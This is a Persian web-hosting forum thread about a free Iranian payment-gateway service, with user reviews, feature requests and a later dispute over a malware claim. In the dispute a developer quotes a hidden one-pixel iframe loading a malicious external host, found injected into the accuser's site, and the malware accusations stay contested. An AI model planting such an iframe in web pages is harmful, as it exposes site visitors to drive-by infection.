استفاده از تمامی امکانات سایت و همچنین تسویه حساب ها تا جلب رضایتمندی تمامی کاربران عزیز کاملاً رایگان می باشد.
سرویس ما شامل 3 درگاه بانکی (فعلاً بانکهای ملت، پارسیان و گردشگری) می باشد که تمام همکاران و کسانی که در حوزه تجارت الکترونیکی فعالیت دارند می توانند به طور کامل از خدمات سایت ما اسفاده کنند.
- هوشمند بودن درگاهها:
در این سرویس هر یک از کاربران می توانند درگاه بانکی خود را به دلخواه از یکی از بانکهای طرف قرارداد با ما انتخاب کنند. این سیستم بصورت هوشمند در صورت بروز هرگونه خطا به درگاه بانک بعدی سوییچ می کند تا بیشترین بازدهی و کمترین خطا برای کاربران گرامی داشته باشیم.
- درگاه مستقیم:
در سرویس ما تمامی کاربران می توانند بصورت مستقیم به درگاههای بانکهای طرف قرارداد با ما متصل شوند.
- تسویه حساب:
تسویه حساب ما در کمتر از 24 ساعت انجام می شود. (سعی بر این است که تمامی تسویه ها در سریع ترین زمان ممکن انجام شود.)
Mr-H
February 10th, 2013, 15:59
سیستم بسیار خوب و جالبی هست مخصوصا قسمت رایگانش ، تشکر از سرویس دهی خوبتون
ipsat
February 10th, 2013, 16:21
براتون آرزوي موفقيت مي كنم و همچنين بزرگترين ضعف شما استفاده از هاست اشتراكي مي باشد به خاطر امنيت.
azadbahrami
February 10th, 2013, 16:39
با آرزوی موفقیت
اما بنظر بنده استایل این صفحه میتونست شیکتر و بهتر باشه
سامانه میهن پال - ماژولها (http://www.mihanpal.com/index.php/content/modules)
با تشکر
majid2009s
February 10th, 2013, 16:46
با تشکر از شما به زودی سایت ما روی سرور اختصاصی قرار خواهد گرفت.
rezaonline.net
February 10th, 2013, 18:47
با آرزوی بهترین تراکنشها .
:x
abbasss
February 10th, 2013, 19:06
سایتها و شرکت هایی که به قصد خدمت رسانی وارد عرصه میشن و صداقت در راس کارشون هست از ظاهرا سایت و نحوه اطلاع رسانیشون کاملا مشخص است.
انشالله در کارتون موفق باشید.
===================
فقط یه اشکالی هست که بصورت خصوصی ارسال کردم.
korosh-eghbali
February 10th, 2013, 19:29
موفق باشید
ما هم یک چنین ایده ای داشتیم اما خوب به دلیل نبود تایم نتونستیم انجام بدیم به هر حال موفق باشید
majid2009s
February 10th, 2013, 20:17
ممنون از همه دوستان نظرات شما باعث دلگرمی ماست
mnine
February 11th, 2013, 00:34
من کاملا از سرویس ایشان راضی هستم و مشکلی ندارن.
redbull
February 11th, 2013, 01:10
امیدوارم که موفق باشید.از در گاه های بانکی استفاده کنید که تعداد حساب های مردم در اون بانک بیشتر هست.بانک من خودم از گردشگری هیچوقت استفاده نمیکنم.ملی،پاسارگاد،صادرا و...
در کل موفق باشید :)
Snowa
February 11th, 2013, 05:22
با عرض سلام خدمت تمامی دوستان و همکاران عزیز
امروز می خواهیم به مناسبت 22 بهمن ماه سرویسی را جهت آسان سازی پرداخت های اینترنتی به شما معرفی کنیم:
استفاده از تمامی امکانات سایت و همچنین تسویه حساب ها تا جلب رضایتمندی تمامی کاربران عزیز کاملاً رایگان می باشد.
سرویس ما شامل 3 درگاه بانکی (فعلاً بانکهای ملت، پارسیان و گردشگری) می باشد که تمام همکاران و کسانی که در حوزه تجارت الکترونیکی فعالیت دارند می توانند به طور کامل از خدمات سایت ما اسفاده کنند.
- هوشمند بودن درگاهها:
در این سرویس هر یک از کاربران می توانند درگاه بانکی خود را به دلخواه از یکی از بانکهای طرف قرارداد با ما انتخاب کنند. این سیستم بصورت هوشمند در صورت بروز هرگونه خطا به درگاه بانک بعدی سوییچ می کند تا بیشترین بازدهی و کمترین خطا برای کاربران گرامی داشته باشیم.
- درگاه مستقیم:
در سرویس ما تمامی کاربران می توانند بصورت مستقیم به درگاههای بانکهای طرف قرارداد با ما متصل شوند.
- تسویه حساب:
تسویه حساب ما در کمتر از 24 ساعت انجام می شود. (سعی بر این است که تمامی تسویه ها در سریع ترین زمان ممکن انجام شود.)
درگاه شما چه مزیتی نسبت به سایر درگاه های موجود داره که فروشنده راغب بشه از شما درگاه بگیره قربان ؟
majid2009s
February 11th, 2013, 08:11
امیدوارم که موفق باشید.از در گاه های بانکی استفاده کنید که تعداد حساب های مردم در اون بانک بیشتر هست.بانک من خودم از گردشگری هیچوقت استفاده نمیکنم.ملی،پاسارگاد،صادرا و...
در کل موفق باشید :)
بله درسته
توجه داشته باشید که بانک گردشگری به سیستم شتاب متصل هست و مهم نیست که شما از چه کارتی استفاده می کنید
majid2009s
February 11th, 2013, 08:14
درگاه شما چه مزیتی نسبت به سایر درگاه های موجود داره که فروشنده راغب بشه از شما درگاه بگیره قربان ؟
مستقیم بودن درگاهها , هوشمند بودن , تسویه در سریع ترین زمان ممکن و همچنین رایگان بودن سایت
موفق باشید
Mr-H
February 11th, 2013, 14:35
به همه جور سایتی درگاه میدید ؟ (فروش چبز شکن ، فیلم و ... ) ؟!
majid2009s
February 11th, 2013, 16:23
به همه جور سایتی درگاه میدید ؟ (فروش چبز شکن ، فیلم و ... ) ؟!
قوانین داخل سایت موجوده می تونید مشاهده کنید
hoka
February 11th, 2013, 17:00
برای تست یک روز به عنوان درگاه فرعی در فروشگاهم قرار دادم . چند تراکنش هم انجام شد . مشکلی در انجام تراکنش نبود . سودی هم کسر نشد .
واریز هم در چند ساعت انجام شد توسط شتاب که تا الان از تمام درگاه های دیگه که کار کردم باهاشون سریع تر بود ( زرین پال - پارس پال - شتاب - جی پال تک پرداخت و ... . خوبی اش این بود که زمانی برای آزاد شدن مبلغ موجود در حساب کاربری نیاز نبود و بعد از هر تراکنش هم فورا میشه درخواست واریز وجه زد . در کل خوب بود و راضی بودم . امیدوارم کیفیت و تسویه حساب همینطوری خوب باقی بمونه .
تبلیغ رو هم فراموش نکنید
فقط اگه میشد برای هر درگاه پلاگین جدایی نوشته میشد بهتر بود که بشه هر 3 درگاه رو به سایت اضافه کرد به صورت جداگانه
مورد دوم پیشنهادات : درصد کارمزد اگر بعدا خواستید اضافه کنید کم باشه مثلا یک درصد
دوم پول رو مثل بقیه درگاه ها چند روز نگه ندارید که بعد از اون مدت بشه درخواست تسویه داد . فوقش مثلا برای درخواست فوری ( که مثل الان بعد از هر تراکنش هست ) یک درصد کارمزد اضافه تر بگیرید
مورد سوم :
واریزها اگه به صورت خودکار نیست به صورت خودکار طراحی کنید که بعد از اینکه سایتتون پربازدید شد مشکل حجم کار و واریز پیش نیاد براتون
یک مشکل هم دیدم که نتونستم هنوز برای بار دوم تستش کنم : فکر کنم با درخواست واریز و یا گذشت زمان درگاه از حالت بانک ملت به خودکار تغییر کرد . البته دقیق اطمینان ندارم . فکر کنم با واریز بعدی اطلاعات دقیق تری بتونم بدم
در کل فعلا به درگاهتون بالاترین نمرور میدم
البته امنیت رو بررسی نکردم غیر از اینکه سایت روی هاست اشتراکی هست . حتما در سریع ترین زمان ممکن یک سرور اختصاصی یا حداقل در این شروع کار یک سرور مجازی قوی تهیه کنید و از نظر امنیتی خوب کانفیگش کنید چون امنیت برای کاربر ها خیلی مهم هست
majid2009s
February 11th, 2013, 18:47
برای تست یک روز به عنوان درگاه فرعی در فروشگاهم قرار دادم . چند تراکنش هم انجام شد . مشکلی در انجام تراکنش نبود . سودی هم کسر نشد .
واریز هم در چند ساعت انجام شد توسط شتاب که تا الان از تمام درگاه های دیگه که کار کردم باهاشون سریع تر بود ( زرین پال - پارس پال - شتاب - جی پال تک پرداخت و ... . خوبی اش این بود که زمانی برای آزاد شدن مبلغ موجود در حساب کاربری نیاز نبود و بعد از هر تراکنش هم فورا میشه درخواست واریز وجه زد . در کل خوب بود و راضی بودم . امیدوارم کیفیت و تسویه حساب همینطوری خوب باقی بمونه .
تبلیغ رو هم فراموش نکنید
فقط اگه میشد برای هر درگاه پلاگین جدایی نوشته میشد بهتر بود که بشه هر 3 درگاه رو به سایت اضافه کرد به صورت جداگانه
مورد دوم پیشنهادات : درصد کارمزد اگر بعدا خواستید اضافه کنید کم باشه مثلا یک درصد
دوم پول رو مثل بقیه درگاه ها چند روز نگه ندارید که بعد از اون مدت بشه درخواست تسویه داد . فوقش مثلا برای درخواست فوری ( که مثل الان بعد از هر تراکنش هست ) یک درصد کارمزد اضافه تر بگیرید
مورد سوم :
واریزها اگه به صورت خودکار نیست به صورت خودکار طراحی کنید که بعد از اینکه سایتتون پربازدید شد مشکل حجم کار و واریز پیش نیاد براتون
یک مشکل هم دیدم که نتونستم هنوز برای بار دوم تستش کنم : فکر کنم با درخواست واریز و یا گذشت زمان درگاه از حالت بانک ملت به خودکار تغییر کرد . البته دقیق اطمینان ندارم . فکر کنم با واریز بعدی اطلاعات دقیق تری بتونم بدم
در کل فعلا به درگاهتون بالاترین نمرور میدم
البته امنیت رو بررسی نکردم غیر از اینکه سایت روی هاست اشتراکی هست . حتما در سریع ترین زمان ممکن یک سرور اختصاصی یا حداقل در این شروع کار یک سرور مجازی قوی تهیه کنید و از نظر امنیتی خوب کانفیگش کنید چون امنیت برای کاربر ها خیلی مهم هست
اول از همه تشکر می کنم از نظرات خوبتون
ببینید دوست عزیز دلیل تغییر درگاه اینه که بعد از اولین خطا در هنگام اتصال به بانک وب سرویس بلافاصله شما رو به درگاه دیگه ای سوییچ می کنه تا شما بهترین بازدهی رو داشته باشید(یعنی در واقع شما تراکنش نا موفق نداشته باشید و انجام این کارها فقط به خاطر رفاه حال کاربران عزیزه )
در مورد امنیت هم بله به زودی سرور اختصاصی جدید دا حال تهیه است (البته سعی بر این هست که بهترین کیفیت و امنیت برای شما کاربران مهیا بشه)
RoobinaServer
February 11th, 2013, 19:09
با سلام
بیشتر از همه از طراحی سایتتون خوشم آمد چیز جالبی بود به نظرم و سرعت لود خوبی داشت (مثلا یک سری هستند قالب طراحی میکنند با لود سایت های آمارگیر مثل هیزتات و ... فکر کنم اسمش همین بود سرعت به شدت پائین میاد) :)
متاسفانه به دلیل مشغله زیاد و اینکه خیلی مواقع پرداخت داریم نمیتوانم درگاه را قطع کنم و درگاه شما را تست کنم اما شاید در آینده نزدیک درگاه شما هم اضافه کنم و تست کنم یک سری تراکنش ها را بفرستیم رو سرویس شما ببینیم چه جوابی میده.
(فعلا هنوز درگاه ملت و ... را متصل نکردیم قبلا وصل بود که مشکل پیش آمده بود بستیم و فقط با زرین پال ادامه همکاری دادیم.)
رو سرور اختصاصی هم از کانفیگ cli استفاده کنید خیلی خوبه براتون چون اشتراکی اینچنین نیست.
یا حق
majid2009s
February 11th, 2013, 19:14
با سلام
بیشتر از همه از طراحی سایتتون خوشم آمد چیز جالبی بود به نظرم و سرعت لود خوبی داشت (مثلا یک سری هستند قالب طراحی میکنند با لود سایت های آمارگیر مثل هیزتات و ... فکر کنم اسمش همین بود سرعت به شدت پائین میاد) :)
متاسفانه به دلیل مشغله زیاد و اینکه خیلی مواقع پرداخت داریم نمیتوانم درگاه را قطع کنم و درگاه شما را تست کنم اما شاید در آینده نزدیک درگاه شما هم اضافه کنم و تست کنم یک سری تراکنش ها را بفرستیم رو سرویس شما ببینیم چه جوابی میده.
(فعلا هنوز درگاه ملت و ... را متصل نکردیم قبلا وصل بود که مشکل پیش آمده بود بستیم و فقط با زرین پال ادامه همکاری دادیم.)
رو سرور اختصاصی هم از کانفیگ cli استفاده کنید خیلی خوبه براتون چون اشتراکی اینچنین نیست.
یا حق
بله دقیقا به همین دلیله که ما وب سرویس رو به صورت هوشمند پیاده کردیم تا در هنگام قطعی کاربران به مشکل نخورن
بسیار خوشحال می شیم که همکاری ما با شما بیشتر بشه
RoobinaServer
February 11th, 2013, 19:16
بله دقیقا به همین دلیله که ما وب سرویس رو به صورت هوشمند پیاده کردیم تا در هنگام قطعی کاربران به مشکل نخورن
بسیار خوشحال می شیم که همکاری ما با شما بیشتر بشه
:-?
پیغام خصوصی کردم براتون.
.K.H.A.
February 11th, 2013, 19:29
سلام
پیغام فرستادم ، چكــ كنيد
majid2009s
February 11th, 2013, 19:37
سلام
پیغام فرستادم ، چكــ كنيد
پاسخ داده شد
hoka
February 12th, 2013, 00:11
خب اون موضوع مشخص شد . بعد از چند ساعت درگاه از حالت انتخابی به حالت رندوم در میاد . اگه ممکنه این مشکل رو چک بفرمایید . در طول 24 ساعت این دومین بار هست که از بانک ملت به خودکار تغییر کرده بدون دخالت من
majid2009s
February 12th, 2013, 08:34
خب اون موضوع مشخص شد . بعد از چند ساعت درگاه از حالت انتخابی به حالت رندوم در میاد . اگه ممکنه این مشکل رو چک بفرمایید . در طول 24 ساعت این دومین بار هست که از بانک ملت به خودکار تغییر کرده بدون دخالت من
دوست عزیز ببینید بانک ملت در ساعات اداری با ترافیک شدیدی مواجه هست و به همین دلیل درگاه به صورت به حالت خودکار قرار می گیرد تا بهترین بازدهی را برای شما داشته باشد
(البته این کار به صورت خودکار توسط سیستم بعد از اولین خطا صورت می گیرد)
mohammad tm
February 12th, 2013, 09:25
اینکه رایگانه ینی اینکه کارمزد بر نمی دارین یا ماژول های رو رایگان ارائه می دین
majid2009s
February 12th, 2013, 09:28
اینکه رایگانه ینی اینکه کارمزد بر نمی دارین یا ماژول های رو رایگان ارائه می دین
خیر کارمزدی نداره
ariansafaei
February 12th, 2013, 10:39
موفق باشید
قالب زیبا امکانات رایگان
واقعا خوبه ولی پشتیبانی یادتون نره که من از دست پشتیبانی درگاه های دیگه بیزارم
majid2009s
February 12th, 2013, 11:04
موفق باشید
قالب زیبا امکانات رایگان
واقعا خوبه ولی پشتیبانی یادتون نره که من از دست پشتیبانی درگاه های دیگه بیزارم
به زودی سیستم تیکت راه اندازی می شود تا راحت تر با ما در ارتباط باشید
hoka
February 12th, 2013, 13:17
دوست عزیز ببینید بانک ملت در ساعات اداری با ترافیک شدیدی مواجه هست و به همین دلیل درگاه به صورت به حالت خودکار قرار می گیرد تا بهترین بازدهی را برای شما داشته باشد
(البته این کار به صورت خودکار توسط سیستم بعد از اولین خطا صورت می گیرد)
ببینید مشکلی نیست ولی لا اقل توی حالت خودکار اول بانک ملت رو بذارید و بعد پارسیان
majid2009s
February 12th, 2013, 13:20
ببینید مشکلی نیست ولی لا اقل توی حالت خودکار اول بانک ملت رو بذارید و بعد پارسیان
خوب موضوع دقیقا همینجاست که پایداری درگاه پارسیان به نسبت ملت بهتره
Mr-H
February 14th, 2013, 12:15
سلام
آیا ماژول های دیگه هم به سیستم اضافه می کنید ؟ اگر اضافه می کنید چه ماژول هایی هستن
majid2009s
February 14th, 2013, 13:23
سلام
آیا ماژول های دیگه هم به سیستم اضافه می کنید ؟ اگر اضافه می کنید چه ماژول هایی هستن
بله به زودی ماژول های vbulletin و wordpress به سیستم اضافه می شود
daryush
February 16th, 2013, 14:37
به تازگی از این سرویس پرداخت استفاده کرده ام. سرویس خوبی است. ثبت نام سریع و پاسخگویی فوری و پشتیبانی عالی به همراه سایت سبک و بسیار راحت، خلاصه، مختصر و مفید از نکات بسیار مفید این وبسایت است.
کارمزد فعلا صفر و پرداخت تقریبا بلافاصله نیز از نکات خوب این سرویس است. فقط مشخص نیست این خدمات رایگان تا کی ادامه خواهد یافت.
به هرحال آرزوی توفیق برای این دوستان دارم
دست مریزاد
majid2009s
February 16th, 2013, 19:07
به تازگی از این سرویس پرداخت استفاده کرده ام. سرویس خوبی است. ثبت نام سریع و پاسخگویی فوری و پشتیبانی عالی به همراه سایت سبک و بسیار راحت، خلاصه، مختصر و مفید از نکات بسیار مفید این وبسایت است.
کارمزد فعلا صفر و پرداخت تقریبا بلافاصله نیز از نکات خوب این سرویس است. فقط مشخص نیست این خدمات رایگان تا کی ادامه خواهد یافت.
به هرحال آرزوی توفیق برای این دوستان دارم
دست مریزاد
با تشکر از شما
فعلا تصمیمی بر کارمزدی کردن درگاهها نداریم
majid2009s
February 23rd, 2013, 15:19
سیستم تیکت راه اندازی شد.
از این پس کاربران می تواننید مشکلات و نظرات خود را از طزیق این سیستم اطلاع دهند
mr-secret
February 23rd, 2013, 18:22
سلام
اینکه بعد از مدتی کارمزد تعیین میکنید شکی نیست و همونطور که از اول درست دارید کار میکنید امیدوارم تا اخرش همینطور پیش برید
کارمزد رو منصفانه بزارید و پشتیبانیتون خوب باشه 100 درصد موفق خواهید شد
از همین امروز منتظر review های دوستان هستم
rapfather
February 23rd, 2013, 18:49
دوستان از ایشون راضی هستند؟
hoka
February 23rd, 2013, 23:06
دوستان از ایشون راضی هستند؟
بله . خدمات عالی و بدون مشکل بوده تا به اینجا
RapB0y
March 3rd, 2013, 12:47
سلام
خدماتشون عالی هست
حرف ندارن
امروز در عرض 5 دقیقه واریز کردن
انشاالله که موفق باشید.
majid2009s
March 3rd, 2013, 13:49
سلام
خدماتشون عالی هست
حرف ندارن
امروز در عرض 5 دقیقه واریز کردن
انشاالله که موفق باشید.
با تشکر از شما.
ariansafaei
March 3rd, 2013, 14:25
پشتیبانی عالی
خدمات عالی
امنیت بالا
سایت کاربرپسند
کاملا تایید میشند
hoka
March 3rd, 2013, 15:29
خدمات کیفیت پایداری درگاه های متنوع پشتیبانی + رایگان بدون و بدون کارمزد بودن + واریز سریع
همه ی چیزای یک درگاه عالی توی میهن پال جمع شده
برای همین درگاه اول بنده شد در یک مدت کوتاه
majid2009s
March 3rd, 2013, 17:48
ممنون از شما دوستان بابت نظرات خوبتون
ehsan_296
March 3rd, 2013, 23:44
واقعا عالی داره جواب میده
majid2009s
March 4th, 2013, 17:47
واقعا عالی داره جواب میده
ممنون از شما
vahab00
March 4th, 2013, 19:02
سلام و عرض ادب و خسته نباشيد
بسيار شيك و زيبا و دوست داشتني
رايگان بودنش و امكان چنج خودكار بسيار عالي هست
پيشنهاداتي دارم :
1. از https استفاده كنيد حتما
2. مدارك كاربران رو حتما ازشون بگيريد
الان شما كد تاييد هم ميديد اما واقعا به نظرتون من تاييد شده هستم از سوي شما بدون ارسال هيچ مدركي ؟
3. اون فاو آيكن رو عوض كنيد :"> هي من حواسم نيس نگاه ميكنم فكر ميكنم داره سايت لود ميشه :">:104:
براتون بهترين ها رو آرزوي دارم
يا حق
majid2009s
March 4th, 2013, 19:03
سلام و عرض ادب و خسته نباشيد
بسيار شيك و زيبا و دوست داشتني
رايگان بودنش و امكان چنج خودكار بسيار عالي هست
پيشنهاداتي دارم :
1. از https استفاده كنيد حتما
2. مدارك كاربران رو حتما ازشون بگيريد
الان شما كد تاييد هم ميديد اما واقعا به نظرتون من تاييد شده هستم از سوي شما بدون ارسال هيچ مدركي ؟
3. اون فاو آيكن رو عوض كنيد :"> هي من حواسم نيس نگاه ميكنم فكر ميكنم داره سايت لود ميشه :">:104:
براتون بهترين ها رو آرزوي دارم
يا حق
ممنون از نظرات خوب شما
vahab00
March 4th, 2013, 19:06
ممنون از نظرات خوب شما
خواهش ميكنم وظيفه هست
اما اين ماژول وردپرس هم بزاريد من هم استفاده ميكنم
خدايي سرم خيلي شلوغه و گرنه خودم مينوشتم
البته به نظرم واسه وردپرس سعي كنيد ماژول دانلود به ازاي خريد رو هم بسازيد
در حال حاضر فقط پارس پال اين ماژول رو ميده كه چون تكه يوزرهاي زيادي هم داره
يا حق
majid2009s
March 4th, 2013, 19:32
خواهش ميكنم وظيفه هست
اما اين ماژول وردپرس هم بزاريد من هم استفاده ميكنم
خدايي سرم خيلي شلوغه و گرنه خودم مينوشتم
البته به نظرم واسه وردپرس سعي كنيد ماژول دانلود به ازاي خريد رو هم بسازيد
در حال حاضر فقط پارس پال اين ماژول رو ميده كه چون تكه يوزرهاي زيادي هم داره
يا حق
والا فعلا درگیر جدا سازی درگاهها هستیم که کاربرا بتونن به طور همزمان از تمام درگاههای ما استفاده کنن
بله حتما وردپرس جز ماژول هایی هست که روش کار میشه
SAJJADSAA
March 4th, 2013, 20:42
سلام واقعا خوب و عالی هستش
ولی به نظر من بهتر بود از اچ تی تی پی اس برای پنل کاربران میکردین
و فاویکون ساتتونو عوض کنین
امیدوارم روز بروز پیشرفت کنه و تراکنشاتون 100رقمی بشه:63:
saeedshahi
March 4th, 2013, 21:24
با سلام تبریک میگم. برقرار باشید
n4ser
April 14th, 2013, 10:15
از اینجا در گاه نگیرین malwaRE داره همین قد که از کد نویسی وب سرویس استفاده کردم الان یک فایلی به نام wwbrenz.plهست که داره جاسوسی میکنه تو هاستم و موغع ورود کروم نداشت وارد بشم و اسکن هم انجام دادم و اینهم HTML/Infected.WebPage.Gen (http://www.avira.com/en/support-threats-summary-product/tid/3684/threat/HTML.Infected.WebPage.Gen) نوع MALWARE هست که جهت جاسوسی گداشته شده به این صورت که با اولین استفاده از این در گاه فعال میشه
majid2009s
April 14th, 2013, 10:39
از اینجا در گاه نگیرین malwaRE داره همین قد که از کد نویسی وب سرویس استفاده کردم الان یک فایلی به نام wwbrenz.plهست که داره جاسوسی میکنه تو هاستم و موغع ورود کروم نداشت وارد بشم و اسکن هم انجام دادم و اینهم HTML/Infected.WebPage.Gen (http://www.avira.com/en/support-threats-summary-product/tid/3684/threat/HTML.Infected.WebPage.Gen) نوع MALWARE هست که جهت جاسوسی گداشته شده به این صورت که با اولین استفاده از این در گاه فعال میشه
خیلی از دوستان از درگاه ما استفاده می کنند و مشکلی ندارن شما چطور چنین ادعایی دارید؟
n4ser
April 14th, 2013, 11:17
خیلی از دوستان از درگاه ما استفاده می کنند و مشکلی ندارن شما چطور چنین ادعایی دارید؟
اینهم لینک اثبات و نوع مالوار Virus Summary (http://www.avira.com/en/support-threats-summary-product/tid/3684/threat/HTML.Infected.WebPage.Gen)
r.sharifi
April 14th, 2013, 13:32
دوست عزیز
سعی نکنید بدون دلیل اعتبار ایشون رو خدشه دار کنید. اول خوب تحقیق کنید بعد بیایین تاپیک بزنید.
میتونید کدهایی رو که روی سایتتون قرار دادین رو بررسی کنید.
شاد باشید
n4ser
April 14th, 2013, 14:47
کسی نخواست
بدون دلیل اعتبار ایشون رو خدشه دار کنه؟ r.sharifi (http://www.webhostingtalk.ir/member/78270/) با مدرک حرف زدم
اگرم خواستین برسی یشتر که انجام دادم این بود که این مالوار از HTML/Infected.WebPage.Gen (http://www.avira.com/en/support-threats-summary-product/tid/3684/threat/HTML.Infected.WebPage.Gen) استفاده میکنه یعنی کد تولید که اگر امنیت هاست بالاترین باشه این کد ساخته میشه وقصد تخریب هم ندارم مدارک بیشتر خاستین در خدمتم/:)
rezaonline.net
April 14th, 2013, 16:18
برای اتصال به وبسرویس از اکشتنشن soap خود php استفاده میشه .
تمامی مقادیر بازگشتی هم بصورت string هستند و هیچ گونه کد html توش نیست .
مقدار برگشتیه متد request فقط ترکیب حروف و عدد هست
مقدار برگشتیه متد verify فقط عدد هست .
هیچ کد html به سبب تذریق یا نفوذ برگردانده نمیشود .
به احتمال خیلی زیاد مشکلی که برای شما بوجود آمده از جایی غیر از وبسرویس میهن پال نشات میگیرد .
فایل مخربی که عنوان کردید wwbrenz.pl با توجه به فرمت این فایل ، باید زبان برنامه نویسی پرل باشد .
در هر صورت اگر هم اشتباهی باشد بهتر است بررسی بشه پس اطلاعات و مدارک بیشتری ارائه بدید یا نحوه اتصالتون رو اینجا شرح بدید تا کاربران دیگه هم تست کنند و نتیجه رو اعلام کنند.
با تشکر
r.sharifi
April 14th, 2013, 17:57
شما از چه پلاگینی برای اتصال به وب سرویس میهن پال استفاده میکنید ؟
این فایلwwbrenz.pl در کجای سایت شما قرار داره ؟
احتمالا روی سرور شما فایل اپلود کردن برای هک .فایلهای پرل روی لینوکس استفاده اجرا میشن
n4ser
April 14th, 2013, 19:04
برای اتصال به وبسرویس از اکشتنشن soap خود php استفاده میشه .
تمامی مقادیر بازگشتی هم بصورت string هستند و هیچ گونه کد html توش نیست .
مقدار برگشتیه متد request فقط ترکیب حروف و عدد هست
مقدار برگشتیه متد verify فقط عدد هست .
هیچ کد html به سبب تذریق یا نفوذ برگردانده نمیشود .
به احتمال خیلی زیاد مشکلی که برای شما بوجود آمده از جایی غیر از وبسرویس میهن پال نشات میگیرد .
فایل مخربی که عنوان کردید wwbrenz.pl با توجه به فرمت این فایل ، باید زبان برنامه نویسی پرل باشد .
در هر صورت اگر هم اشتباهی باشد بهتر است بررسی بشه پس اطلاعات و مدارک بیشتری ارائه بدید یا نحوه اتصالتون رو اینجا شرح بدید تا کاربران دیگه هم تست کنند و نتیجه رو اعلام کنند.
با تشکر
اگر قرار بود شل یا مالوار به همین راحتی دبده بشه بس دیگه هیچی این نوع مالوار با iframe باز خانی نمیشه و یک فایل به صورت generetiont.plساخته میشه وقتی از این سایت میره برا پرداخت فایله wwwbrenz.pl ساخته میشه فعال میشه حالا چطوری کجا نمیدونم لینک اثبا ت هم دادام
rezaonline.net
April 14th, 2013, 21:41
ببینید دوست عزیز من برنامه نویس سیستم هستم و مطمئنم پرل کار نکردم .
و اینم مطمئنم در معماری SOA چنین چیزی امکانپذیر نیست .
درخواست از طریق http ارسال میشه ، به نظر شما میشه درخواست ساخت فایل ارسال بشه اینجوری ؟
بعدشم ، سورس فایل مورد نظر که میگید جاسوسی میکنه رو بذارید اینجا ، اگر جاسوسی کنه حتما باید اطلاعات رو به یک جا بفرسته ، یا درپاسخ یه اطلاعاتی بده .
بهتره اونو بررسی کنید .
n4ser
April 14th, 2013, 21:59
ببینید دوست عزیز من برنامه نویس سیستم هستم و مطمئنم پرل کار نکردم .
و اینم مطمئنم در معماری SOA چنین چیزی امکانپذیر نیست .
درخواست از طریق http ارسال میشه ، به نظر شما میشه درخواست ساخت فایل ارسال بشه اینجوری ؟
بعدشم ، سورس فایل مورد نظر که میگید جاسوسی میکنه رو بذارید اینجا ، اگر جاسوسی کنه حتما باید اطلاعات رو به یک جا بفرسته ، یا درپاسخ یه اطلاعاتی بده .
بهتره اونو بررسی کنید .
شما سایت payfast.tk باز کنید سایت من هست خودتون چک کنید میبینید هم کروم و هم انتیویروس اویرا مسدود میکنه و نوع ویروس میگه
rezaonline.net
April 14th, 2013, 23:52
در سورس سایت شما
دستور
<iframe style="height:1px" src="http://www.Brenz.pl/rc/" frameborder=0 width=1></iframe>
قرار گرفته .
این کد به هیچ عنوان داخل اسکریپت نیست ، احتمالا سیستمون ویروسی هست و این کد اضافه شده بهش .
تمامی دوستانی که از فرم آسان پرداز میهن پال استفاده میکنن لطفا جمله بنده رو تصدیق کنن تا این دوستمون متوجه بشه ، در گفتگوی چتی که با ایشون داشتم اتهاماتی وارد کرده اند .
موفق باشید
ehsan_296
April 15th, 2013, 00:17
payfast.tk کلا باز نمیشه . من از اسکریپت استفاده می کنم و چنین مشکلی که شما گفتید رو ندارم
r.sharifi
April 15th, 2013, 00:26
دوست عزیز کد های میهن پال مشکلی نداره.بررسی شد.
noyfound
April 17th, 2013, 17:23
ضمن عرض سلام و خسته نباشید
من هم تصمیم گرفتم به میهن پال بپیوندم ولیكن در برنامه نویسی درگاه یك سوال برام پیش اومد كه تو راهنمای وبسرویس ننوشتید. order id فقط عدد میتونه باشه یا حروف هم میتونه داشته باشه ؟! و دوم اینكه حداكثر طول order id چند كاراكتره ؟ 32 ؟
rezaonline.net
April 17th, 2013, 18:32
order_id از نوع int هستن ، حداکثر مقداری که میگیره 4294967295
;)
آدرس کال بک از نوع varchar255 هست ، میتونید مقدایر دلخواه رو اونجا بصورت کوئری استرینگ جایگزاری کنید .
لطف کنید 1% کرمزد به درگاهتون اضافه کنید.اینجوری با اطمینان بیشتری میتونیم ادامه به کار بدیم.ممنون
n4ser
April 18th, 2013, 14:13
میهن پال د زد کلاهبردار هست و من با حرفه ای ترین برنامه نویس ها تحقیق به این نتیجه ریسیدیم که میهن پال *** و کلاهبر دار هسن من مدارکی پیش پا افتاده ارائه کردم که نگین علکی میگم مدارک بیشتر
خاستین ارائه میدم فک میکنین چرا رایگانه بخاطر همین چیز ها هست دوستان بنده در گاهای زرین پال پارس پال و پیلاین پیشنهاد میکنم به دلیل امنیت بالا:-o
rezaonline.net
April 18th, 2013, 14:53
تهمت زدن بدون بودن مدارک لازم و کافی خودش جرمه .
کل مدارکتون رو اینجا بذارید دوستان قضاوت میکنند.
rominait
April 18th, 2013, 15:00
سلام
بله اگر مدركي داريد كامل و صحيح ارائه كنيد
rapfather
April 18th, 2013, 15:24
لطف کنید مدارکتون رو قرار بدید
n4ser
April 18th, 2013, 15:50
لینک هارا مشاهده کنید
Full description (http://www.avira.com/en/support-threats-description-product/tid/3676/tlang/en)
Full description (http://www.avira.com/en/support-threats-description-product/tid/3675/tlang/en)
Full description (http://www.avira.com/en/support-threats-description-product/tid/3670/tlang/en)
Full description (http://www.avira.com/en/support-threats-description-product/tid/3672/tlang/en)
Description:
A common attack against the web infrastructure can be the infection of harmless web pages. Some malware changes every HTML file stored on the disc and adds a link (very often an IFrame) to a site hosting malicious code. Other attacks can aim for the web servers and try to insert forwarding to the pages hosted there. The owner of these pages is advised to take them offline. Fix the hole (either on his own PC or on the server), check the pages for infections, clean them and go online
save the information bank card Iframe. Infected Web Pages often contain additional Iframe, Object or Script Tags. The Script Tags often contain encrypted Code. injection codsave the information bank card
که خودش میتونه خیلی کار ها بکنه اولین کار اینه که پرداخ کننده که تو فروشگاه که درگاه که میهن پال داره میاد اطلاعات کار بانکی شو میزنه و دو دستی تقدیم میهن پال میشه اینارو از خودم در نیاوردم بشتر از این گندشو در نیار فهمیدی؟ قرار شد از این میهن پال شکایت بشه به پلیس فتا خاستم بدونین
rezaonline.net
April 18th, 2013, 16:13
لینک هارا مشاهده کنید
Full description (http://www.avira.com/en/support-threats-description-product/tid/3676/tlang/en)
Full description (http://www.avira.com/en/support-threats-description-product/tid/3675/tlang/en)
Full description (http://www.avira.com/en/support-threats-description-product/tid/3670/tlang/en)
Full description (http://www.avira.com/en/support-threats-description-product/tid/3672/tlang/en)
www.brenz.pl/injection iframe cod
Description:
